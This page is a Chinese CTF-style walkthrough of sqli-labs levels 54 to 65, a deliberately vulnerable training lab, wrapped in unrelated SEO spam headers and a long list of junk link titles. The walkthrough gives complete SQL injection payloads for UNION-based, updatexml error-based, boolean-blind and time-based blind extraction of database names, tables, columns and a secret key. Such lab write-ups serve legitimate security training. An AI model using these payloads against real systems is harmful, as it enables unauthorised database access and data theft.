当前位置: 首页 > news >正文

自己创免费网站国外seo比较好的博客网站

自己创免费网站,国外seo比较好的博客网站,做网站普洱,烟台建设网站目录 less54(单引号联合查询) less55(数字型括号闭合) less56(单引号括号闭合) less57(双引号闭合) less58(单引号报错注入) less59(数字型…

目录

less54(单引号联合查询)

less55(数字型括号闭合)

less56(单引号括号闭合)

less57(双引号闭合)

less58(单引号报错注入)

less59(数字型报错注入)

less60(双引号括号报错)

less61(单引号双括号闭合)

less62(单引号括号布尔)

less63(单引号时间盲注)

less64(整数型双括号闭合)

less65(双引号括号闭合)



less54(单引号联合查询)

根据提示,我们需要获得并提交secret key,只有十次机会。

首先判断闭合:

?id=1'报错,?id=1'--+正常回显——判断为单引号闭合

?id=1' order by 4--+——判断出有三处回显

?id=' union select 1,2,3--+——找到回显位置

?id=' union select 1,database(),3--+——爆数据库:

可以看到数据库名不再是真正的数据库secirity

?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+——爆表名:

此时,已经用了十次机会了,我们刷新,再次爆表名:

可以看到表名换了!

?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='7znmd3mw6i' and table_schema='challenges'--+——爆字段名

?id=' union select 1,group_concat(secret_GMAW),3 from challenges.7znmd3mw6i--+——爆字段数据:

最终得到secret key



less55(数字型括号闭合)

?id=1'报错——判断为单引号闭合

?id=1'--+报错——没有完全闭合

?id=1')--+和?id=1'))--+均报错——不是单引号闭合

判断可能是数字型的

?id=1--+报错

?id=1)--+回显正常——判断为数字型括号闭合

?id=1) order by 3--+——判断有三处回显

?id=-1) union select 1,2,3--+——找到回显位置:

?id=-1) union select 1,2,database()--+——爆数据库

?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+——爆表名

?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='uepau522nk' and table_schema='challenges'--+——爆字段名

?id=-1) union select 1,2,group_concat(secret_AM07) from challenges.uepau522nk--+——爆数据



less56(单引号括号闭合)

?id=1')--+正常回显——判断为单引号括号闭合

?id=1') order by 3--+——判断回显数

?id=-1') union select 1,2,3--+——找到闭合位置

?id=-1') union select 1,2,database()--+——爆数据库

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+——爆表名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='viqqanp2ve' and table_schema='challenges'--+——爆字段名

?id=-1') union select 1,2,group_concat(secret_O7ZS) from challenges.viqqanp2ve--+——爆数据



less57(双引号闭合)

?id=1"--+正常回显——判断为双引号闭合

?id=1" order by 3--+——判断回显数

?id=-1" union select 1,2,3--+——判断回显位置

?id=-1" union select 1,2,database()--+——爆数据库

?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+——爆表名

?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='o2dzll4tcs' and table_schema='challenges'--+——爆字段名

?id=-1" union select 1,2,group_concat(secret_AXKR) from challenges.o2dzll4tcs--+——爆数据:



less58(单引号报错注入)

?id=1'--+——判断为单引号闭合

因为这里有报错信息,所以我们直接利用报错注入:

?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),1)--+——爆数据库

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+——爆表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jbo4s08eoh' and table_schema='challenges'),0x7e),1)--+——爆字段名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_OVQV) from challenges.jbo4s08eoh),0x7e),1)--+——爆数据:



less59(数字型报错注入)

尝试各种闭合最终均报错,判断可能是数字型

?id=1--+正常回显——判断为数字型

?id=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)--+——爆数据库

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+——爆表名:

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='2q1hlvjbn9' and table_schema='challenges'),0x7e),1)--+——爆字段名

?id=1 and updatexml(1,concat(0x7e,(select group_concat(secret_DVR1) from challenges.2q1hlvjbn9),0x7e),1)--+——爆数据



less60(双引号括号报错)

?id=1")--+——判断为双引号括号闭合

?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+——爆数据库

?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+——爆表名

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='rre9oj57my' and table_schema='challenges'),0x7e),1)--+——爆字段名

?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_GFO1) from challenges.rre9oj57my),0x7e),1)--+——爆数据



less61(单引号双括号闭合)

?id=1'))--+正常回显——判断为单引号双括号闭合

?id=1')) and updatexml(1,concat(0x7e,(database()),0x7e),1)--+——爆数据库

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+——爆表名

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='2t7l282xer' and table_schema='challenges'),0x7e),1)--+——爆字段名

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(secret_XR3E) from challenges.2t7l282xer),0x7e),1)--+——爆数据



less62(单引号括号布尔)

?id=1')--+——判断为单引号括号闭合

?id=1') order by 3--+——判断回显数

这里判断回显位置的时候,没有得到预期的回显内容

那么重新尝试布尔盲注:

?id=1') and (select length(database())=1)--+——爆数据库名长度:

?id=1') and substr((select database()),1,1)='a'--+——爆数据库

?id=1') and substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1)='a'--+——爆表名

?id=1') and substr((select column_name from information_schema.columns where table_name='2t7l282xer' and table_schema='challenges' limit 0,1),1,1)='a'--+——爆字段名

?id=1') and substr((select secret_XR3E from challenges.2t7l282xer limit 0,1),1,1)='a'--+——爆数据



less63(单引号时间盲注)

?id=1'--+——判断为单引号闭合

还是和less62差不多,联合查询注入失效,可以用布尔盲注或时间盲注,这里演示时间盲注:

?id=1' and if((length(database())=10),sleep(5),1)--+——爆数据库名长度

?id=1' and if((substr((select database()),1,1)='c'),sleep(5),1)--+——爆数据库:

?id=1' and if((substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1)='e'),sleep(5),1)--+——爆表名:

?id=1' and if((substr((select column_name from information_schema.columns where table_name='xfy4elkcg' and table_schema='challenges' limit 0,1),1,1)='i'),sleep(5),1)--+——爆字段名

?id=1' and if((substr((select secret_XR3E from challenges.xfy4elkcg limit 0,1),1,1)='D'),sleep(5),1)--+——爆数据



less64(整数型双括号闭合)

?id=1))--+——判断为整数型双括号闭合

和less62/63一样,可以布尔盲注也可以时间盲注,paload和less62、63除了闭合方式不一样,其他都一样,不做赘述。



less65(双引号括号闭合)

?id=1")--+——判断为双引号括号闭合

和less62/63/64一样,可以布尔盲注也可以时间盲注,paload和less62、63、64除了闭合方式不一样,其他都一样,不做赘述。



http://www.yidumall.com/news/10625.html

相关文章:

  • 宜昌市建设信息网站文案代写在哪里接单子
  • 网站哪家做的好河南网站seo推广
  • web网站开发语言嘉定区整站seo十大排名
  • 江苏网站建设电话百度百科怎么创建自己
  • 百度网做网站吗网络推广方法技巧
  • 通辽做网站通过seo来赚钱seo排名优化推广
  • 旅游网站建设合同外贸怎么建立自己的网站
  • 商业网站教程今日热搜第一名
  • 怎样做b2b网站网站收录免费咨询
  • 怎么做监测网站的浏览量制作网站需要多少费用
  • 现在那个网站做视频最赚钱百度网站介绍
  • 中建八局一公司待遇怎么样seo关键词优化报价价格
  • 做外贸网站的都有哪些类型的公司优化营商环境 助推高质量发展
  • 做外贸雨伞到什么网站怎样在百度上推广
  • 网站收录后才可以做排名吗河南企业站seo
  • 阿里巴巴国际站的前台网址是今日重大事件
  • 网站制作网站建网络销售怎么做才能有业务
  • 如何修改网站后台国内永久免费云服务器
  • 微信上发的链接网站怎么做的营销型企业网站诊断
  • 可信网站logo优化手机流畅度的软件
  • 武汉做网站icp产品宣传推广方案
  • 商丘网站建设推广公司桔子seo查询
  • 政府网站设计思路网店推广平台有哪些
  • 网站内容采编怎么做企业网络营销业务
  • 济南市莱芜区人民政府百度seo新算法
  • 黃冈建设厅官方网站娄底地seo
  • wordpress能否做网站站长之家权重
  • wordpress文本悬停变色免费seo在线工具
  • 如何建立国际网站衡阳seo
  • 国家拨款农村建设查询的网站南宁seo网络优化公司